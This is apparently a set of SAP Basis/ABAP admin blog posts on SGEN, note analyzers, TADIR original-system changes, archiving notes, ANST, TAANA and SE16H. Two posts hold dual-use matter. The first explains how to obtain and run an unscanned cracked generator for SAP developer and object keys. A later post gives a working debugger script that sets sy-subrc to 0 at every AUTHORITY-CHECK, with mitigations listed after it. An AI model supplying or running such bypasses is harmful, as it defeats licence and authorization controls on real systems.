ABAP developer keys and object keys hack

A lot of basis and ABAP people feel protected by the ABAP keys and object keys for standard SAP changes. They have to be called off at SAP marketplace keys section.

Let me already give away the clue: since quite some time there is a KeyGen for ABAP and object keys. The protection is gone.

This blog will answer following questions:

  • Where can I download the ABAP keygen?
  • How to run the ABAP keygen?
  • How should I protect my system from unwanted ABAP changes?
  • S4HANA does not use developer keys and object keys any more, how should I protect my S4HANA system from unwanted ABAP changes?

Where can I download the ABAP keygen?

Google for SAP IWR Object key generator. Or click here for a copy:

Upon download: rename the file to .zip and unzip it.

New version W10 compliant, but not scanned (download and use at own risk!)

Credits for this version: Hugos.

Running ABAP keygen

Running the executable is simple. But you need to run it in Windows 7 compatibility mode.

Keygen screen

Fill out the data and hit generate…. that’s all.

The use of this tool is at your own risk. Most admins don't like you to use this tool at all.

The whole idea of this blog is to show not to rely on the developer key procedure.

How should I protect developments?

The best way to protect your development is to carefully grant the S_DEVELOP privilege. Only give it to the right people and only give it to develop Z* range of code.

Deletion of old developer keys is still relevant. Read the dedicated blog on deletion of developer keys.

S4HANA developer key

The title is a bit misleading. In S4HANA there are no developer keys and object keys any more.

Background of this change be SAP can be found in OSS note: 2309060 – The SSCR license key procedure is not supported in SAP S/4 HANA.

So in S4HANA, you must set up authorizations for S_DEVELOP properly.

With S_DEVELOP you have to set create/change rights for the packages and or objects. For custom code only hand out Z* privileges.

If you hand out a * for the objects or classes, then the developer can also change standard SAP.

For more background and further information, read this dedicated blog on ABAP protection in S/4HANA.

DMIS plugin notes analyzer

When you are using DMIS plugin for SLT data replication you will need to regularly apply OSS notes to solve bugs. This blog will explain how to quickly analyze the needed notes using the DMC note analyzer program.

Questions that will be answered in this blog are:

  • How to install the DMC note analyzer programs?
  • How to run the DMC note analyzer programs?

Installation of the DMC note analyzer programs

The new DMC note analyzer programs are delivered via OSS note 3016862 – Note Analyzers with separated scenarios for ABAP-based Migration and Replication Technology (DMIS2011/DMIS2018/DMIS2020/SAP S/4HANA). Minor manual work is required.

These new programs are replacing the old DMC_NOTE_ANALYZER program.

The new programs are separated by function:

ScenarioReport name
Object Based Transformation (OBT) CNV_NOTE_ANALYZER_OBT
ABAP Integration for SAP Data Intelligence (DI)CNV_NOTE_ANALYZER_DI
SAP Landscape Transformation (SLT) Replication ServerCNV_NOTE_ANALYZER_SLT
Near Zero Downtime Technology (NZDT)CNV_NOTE_ANALYZER_NZDT

See also OSS note 2566773 – What should be done with SLT prior to and after an upgrade? – SLT.

Running the new program for use case SLT

With transaction SE38 start program CNV_NOTE_ANALYZER_SLT:

Now start the run.

After the run is done the missing notes are listed:

Installation of the old DMC note analyzer program

The DMC note analyzer program is delivered via SAP oss note 2596411 – SLT / NZDT / S4HANA Migration Cockpit (DMIS2011 SP11-SP15; DMIS2018; S/4HANA 1610, 1709 & 1809) – Note Analyzer.

Minor manual work is needed for the implementation of this OSS note.

Running the old DMC note analyzer

With transaction SE38 start program DMC_NOTE_ANALYZER. On the start screen select whether you want to check for the central system or the source system:

DMIS notes analyzer program start screen

Now start the run.

After the run is done the missing notes are listed:

DMIS notes analyzer program output

From the overview you can start to download the notes and apply them.

SGEN: code generation

After any support pack and upgrade you want to check and make sure the ABAP code in the system is ok and pre-compiled for business use. The SGEN code generator tool does the job for you.

Questions that will be answered in this blog are:

  • How to run SGEN?
  • How can I see the result behind SGEN?

Running SGEN

Starting SGEN is simple by starting the transaction code SGEN. The initial screen looks like this:

Select the option you want to use. The most common feature option is the Regenerate after SAP system upgrade. Press continue. You now reach the load generator screen to distribute the load across many parallel processes:

SGEN load generator

Select the servers and press continue.

SGEN is a resource intensive process: performance during the run will be pretty low....

In the load monitor you now release the job and you can start to monitor it:

SGEN generator monitor

You can also monitor in SM37 the batch job for program RSPARAGENER8M .

Data behind SGEN

Table GENSETM contains the results of the generation run. The field GENSTATUS is the generation status. Values of this field:

X = generated

E or S = error

I = initial

Touch single program or table

SGEN is a mass transaction for large amounts and can run quite long. If you only need to regenerate single program or table, read this blog.


More background information on SGEN can be found in the FAQ note: 1989778 – FAQ: SGEN.

Other notes:

Custom ABAP set original system system

After a copy of a system to a new system (like a sandbox) you will find out the custom objects have a different original system and all changes will result into modification editor in stead of the normal ABAP editor.

Questions that will be answered in this blog are:

  • How to change original system of an object?
  • How to mass change original system of all Z objects in one shot?

Changing original system of an object

To change on original system of an object first start transaction SE03 to go to the transport organizer tools:

SE03 start screen

Select the tool Change Object Directory Entries:

Change object directories selection screen

Here you can select a specific program, function group, etc. In our case, we do a selection on the original system. This will give list of all objects with that original system:

Change object directories objects list

If you select an object and press the Change Object Directory button, you can change the original system of a single object.

Mass change

To execute a mass change you need select the top node first and then give in a command (not a menu option): key in mass in the command part:

Entry mass

Then hit enter and a new hidden popup will come:

Change to new original system

Now enter the new original system and press Ok. All is change in one shot now.

See also OSS note 2690211 – Mass change of Original System.

Emergency program

If for some reason it does not work you can use the below emergency program:

DATAzlt_tadir TYPE TABLE OF tadir.

DATAzls_tadir TYPE tadir.

SELECT FROM tadir INTO TABLE zlt_tadir WHERE srcsystem EQ 'SRC'.
LOOP AT zlt_tadir INTO zls_tadir.
zls_tadir-srcsystem 'TAR'.
MODIFY  tadir FROM zls_tadir.
WRITE sy-subrc.

Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:


Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:


*<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>


*<KIND>1 </KIND>


*       CLASS lcl_debugger_script DEFINITION
CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

      init    REDEFINITION,
      script  REDEFINITION,
      end     REDEFINITION.

ENDCLASS.                    "lcl_debugger_script DEFINITION
*       CLASS lcl_debugger_script IMPLEMENTATION
CLASS lcl_debugger_script IMPLEMENTATION.
  METHOD prologue.
*** generate abap_source (source handler for ABAP)
    super->prologue( ).
  ENDMETHOD.                    "prolog

  METHOD init.
*** insert your initialization code here
  ENDMETHOD.                    "init
  METHOD script.


* debugger commands (p_command):

*        VALUE( P_LINE ) TYPE I

        CALL METHOD abap_source->line
            p_line = DATA(p_line).
      CATCH cx_tpda_src_info .
      CATCH cx_tpda_src_descr_invalidated .

        CALL METHOD debugger_controller->debug_step
            p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
      CATCH cx_tpda_scr_rtctrl_status .
      CATCH cx_tpda_scr_rtctrl .


        CALL METHOD cl_tpda_script_data_descr=>change_value
            p_new_value = '0'
*           p_offset    = -1
*           p_length    = -1
            p_varname   = 'sy-subrc'.
      CATCH cx_tpda_varname .
      CATCH cx_tpda_scr_auth .

  ENDMETHOD.                    "script
  METHOD end.
*** insert your code which shall be executed at the end of the scripting (before trace is saved)
*** here

  ENDMETHOD.                    "end
ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION


Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:


Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.


If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

See also OSS note 3226223 – How to monitor debug activities in SAP Netweaver.

SAP security baseline template

This blog will explain the use of SAP security baseline template.

Questions that will be answered in this blog are:

  • Where to find the SAP security baseline template?
  • What does the SAP security baseline template cover?
  • How can I use the SAP security baseline template?

The SAP security baseline template

Background information and the current download link to the SAP security baseline template can be found in OSS note 2253549 – The SAP Security Baseline Template. Or using following path: https://support.sap.com/sos → Media Library → SAP Security Baseline Template.

Current version is 2.5 from April 2024.

The content

The security baseline template contains a large 150 page word document from SAP covering all the topics of the SAP secure operations road map:

security baseline template overview

For each topic SAP will give must do actions, recommendations, tips and best practices.

This makes the SAP security baseline document a good document for:

  1. Starting security set up for a new greenfield implementation
  2. As as check list for existing implementations

Security baseline validation

SAP Focused run has a tool called security and baseline validation. Read more in this blog.

Security baseline updates

S4HANA has a special program to check for newly updated security baseline parameters after an upgrade. Read more on this topic in this blog.

Data archiving improvement notes 2018

In 2018 SAP ran an improvement project which resulted into a set of OSS notes that will make data archiving more robust and easy.

All of these notes come with manual work. Select the ones really useful.

Archiving write process improvements

Write variant maintenance has been made easier by allowing copying of variants (useful if you have many plants and company codes and want to store each one in different archive file): 2520093 – Archive administration: Enhanced variant maintenance (writing, preprocessing, and postprocessing).

To be able to detail the written file name of the archive file implement this oss note: 2637105 – Print list for archiving write jobs: Placeholders for session numbers, archive file key in title.

Archiving storage process improvements

Archiving system technical check button is available in OAC0, but not in SARA. After applying this note you can also check it in the technical settings in SARA: 2599263 – Connection test for storage systems for archiving object.

Deletion process improvements

To be able to quickly continue with interrupted archiving sessions apply this note 2520094 – Continue: Information on existence of interrupted or incomplete archiving sessions.

This note will implement checks to warn you about uncompleted previous store and delete runs: 2586921 – Run selection for deletion: Information about the existence of unstored archive files.

Some archiving object use the AIS (archiving information system) to enable the end user a quick retrieval of archiving information. This note will give warning before start of deletion if the AIS is note active for the object: 2624077 – Starting delete jobs: Check for active info structures.

Archiving overview and logging improvement

To get a better overall overview of all logs apply OSS note 2433546 – Archive administration logs: Information about errors in hierarchy display. Showing only success message is possible after applying OSS note 2855641 – Logs: New option “Success Messages Only” for detail log.

Direct navigation to Archive File Browser: apply OSS note 2544517 – Archive administration: Direct navigation to ArchiveFileBrowser. This note only gives you a link. You can already start the archive file browser using transaction AS_AFB:

Archive file browser

Note 2823924 – Archive File Browser: Messages that do not belong to the Archive File Browser are output solves a bug in the Archive File Browser.

ANST for webapplications and FIORI

In the blog on ANST we focused on searching notes for ABAP GUI applications. This blog will focus on web application that run ABAP code in the backend (such as FIORI, BSP, webdynpro for ABAP).

Questions that will be answered in this blog are:

  • How do I use ANST for web applications?
  • What do I need to do to prepare my system for this?
  • What do I need to do for using ANST for FIORI back end recording?

System preparation for ANST for web applications

First you need to follow the instructions in OSS note 2286869 – ANST: Trace On/Off error “Dynamic Start and Stop cancelled by user” to get rid of the trace error. Unfortunately this note is not really clear. The short instruction on what to do follows now. Go to transaction FILE and search for the ANST_TRACES_GLOBAL. It should look like this:

ANST delete assignment of paths

Then select the logical file definition and delete the line for Physical path. Should look like this:

Now we are good to go for the web part recording, but not yet for FIORI.


To use ANST for FIORI you first need to install OSS note
2605555 – ANST: Enahcement to support Fiori applications
. Please follow also the manual steps in the note very carefully.

Tip: this note contains a very good PDF attachment as manual for ANST.

Run ANST for web application

Running ANST for web applications is not very much different from running on SAP GUI. Upon start of the ANST tool select your web application (which is bit different per application):


After you now start with Execute you get a popup screen to confirm recording start:


After pressing start your web browser will start and you can perform the actions you want to trace. To stop go back to the ABAP screen and press the Stop Recording button:


The rest of the ANST processing is the same as usual.

Reference OSS notes

Reference and bug fix notes:

TAANA improvement to count dynamic subfields

SAP has done an improvement on TAANA to count dynamic subfields. This blog will explain how. More generic information on TAANA can be found in this blog.

Questions that will be answered in this blog are:

  • How to get the new TAANA function for dynamic subfields?
  • How to run TAANA dynamic subfields?

How to get the new TAANA function for dynamic subfields?

Simply apply improvement OSS note 2614476 – TAANA: Several dynamic subfields with reference to same reference field.

How to run dynamic subfields in TAANA?

We will use table JEST as example. This table as a pretty annoying setup. The main field OBJNR is in fact 2 fields: the first 2 characters are object identification, and the second part is a number for the object. But if you want to analyze how many objects type you have this is problematic with SE16.

JEST table content

In TAANA we can use the dynamic subfields. Start transaction TAANA and create an Ad Hoc Anlysis for table JEST. First hit Execute to start, enter table JEST and in this screen hit the Ad Hoc Variant button:

TAANA JEST Create Ad Hoc Variant

Now select the OBJNR field:

Ad hoc analysis with offset and subfield length

In the Offset field fill 0. And in Subfield length 2. This means take first 2 characters of field OBJNR. Press ok and start the run in the background.

The end result is a cross section with counts on the types of the first 2 characters in JEST-OBJNR:

TAANA JEST results

SE16S and SE16H

For some searches, also have a look at SE16S and SE16H.

SE16H: HANA specific implementation of SE16

SE16H is a HANA specific implementation of SE16. This blog will explain the additional functions of SE16H.

Questions that will be answered in this blog are:

  • How to use SE16H?
  • Where to find full list of SE16H functions?
  • Which bug fix notes for SE16H should I apply?

SE16H: HANA specific implementation of SE16

SE16 or SE16N are one of the most used transactions for data analysis on any SAP system. SE16H is the HANA specific implementation which leverages some of the HANA specific strengths.

Transaction code to start is simply SE16H. We now enter VBAK as example table. Just pressing execute will give simple list of first 500 entries. Nothing new.

Now we run again, but tick the Group and Sort tick boxes for the Document Category field:

SE16H VBAK example input

The output now is a sum of the sales orders in table VBAK grouped by identical Document Category:

SE16H VBAK example output

TAANA vs SE16H vs SE16S

If you run on HANA, the SE16H transaction is a faster option than the classical TAANA transaction, since SE16H runs online and TAANA runs as batch.

SE16H is for lookup of single table. SE16S can search for content in one or multiple tables. More on SE16S in this blog.

For usage of SE16N, read this blog.

List of all SE16H functions

The full list of all SE16H functions can be found in OSS note 1636416 – CO-OM tools: Functions of transaction SE16H.

Interesting ones are: aggregation, drill down, sorting, totaling, outer joins.

New function is the use of a formula editor. This can be used after applying OSS note 2795867 – CO-OM tools: Implementation of formula editor in SE16H.

SE16H bug fix notes

Please consider the following bug fix OSS notes for SE16H: